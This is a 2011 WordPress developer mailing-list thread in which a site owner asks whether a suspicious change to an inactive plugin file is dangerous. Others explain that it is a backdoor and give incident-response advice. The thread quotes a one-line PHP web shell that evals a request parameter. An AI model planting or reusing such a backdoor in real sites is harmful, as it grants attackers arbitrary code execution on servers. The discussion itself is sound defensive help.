[wp-hackers] Possible Exploit

Charles Frees-Melvin wordpress at cefm.ca
Sun Jun 12 13:05:09 UTC 2011


That is quite common. Many attacks are from other non-secure sites on the same server.

--
Charles E. Frees-Melvin
www.cefm.ca

On 2011-06-12, at 10:00, Baki Goxhaj <banago at gmail.com> wrote:

> Wrote to my hosting account. This is what they are saying:
> 
> Due to the clustered structure of our systems there is no single log file
>> for you to use as your site is served by many servers.I would suggest you to
>> please make a full audit of your account in that regards and remove the
>> malicious code if you find any.
>> 
> 
> Crazy - I have like 15 websites on there.
> 
> Kindly,
> 
> Baki Goxhaj
> www.wplancer.com | proverbhunter.com | www.banago.info<http://proverbhunter.com>
> 
> 
> On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au>wrote:
> 
>> Check your access logs for strange requests at the time the file was
>> detected,  You'll hopefully be able to see a POST request to one of the
>> plugin files at that point in time, or perhaps a long GET request, if you
>> can narrow down the file attacked, you can work out which plugin has the
>> vulnerability in it..
>> 
>> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
>> 
>>> I removed it as soon I found out about it. I hope my other installs are
>> not
>>> infected as I don't have the file monitor running there.
>>> 
>>> Kindly,
>>> 
>>> Baki Goxhaj
>>> www.wplancer.com | proverbhunter.com | www.banago.info<
>>> http://proverbhunter.com>
>>> 
>>> 
>>> On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk> wrote:
>>> 
>>>> n Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
>>>>> Just got an email from my file monitor plugin that a file had been
>>>> changed -
>>>>> it is an inactive plugin file, strangely enough. Here is the content
>> of
>>>> the
>>>>> file now:
>>>>> 
>>>>> <?php
>> if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc']));
>>> ?>
>>>>> 
>>>>> Is this something dangerous?
>>>> 
>>>> Yes this is extremely dangerous. It's basically a backdoor to allow
>>>> arbitrary PHP code execution on your server. You should remove that
>>>> code immediately, change passwords, do a full cleanup, etc.
>>>> _______________________________________________
>>>> wp-hackers mailing list
>>>> wp-hackers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>>> 
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>> 
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>> 
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers


More information about the wp-hackers mailing list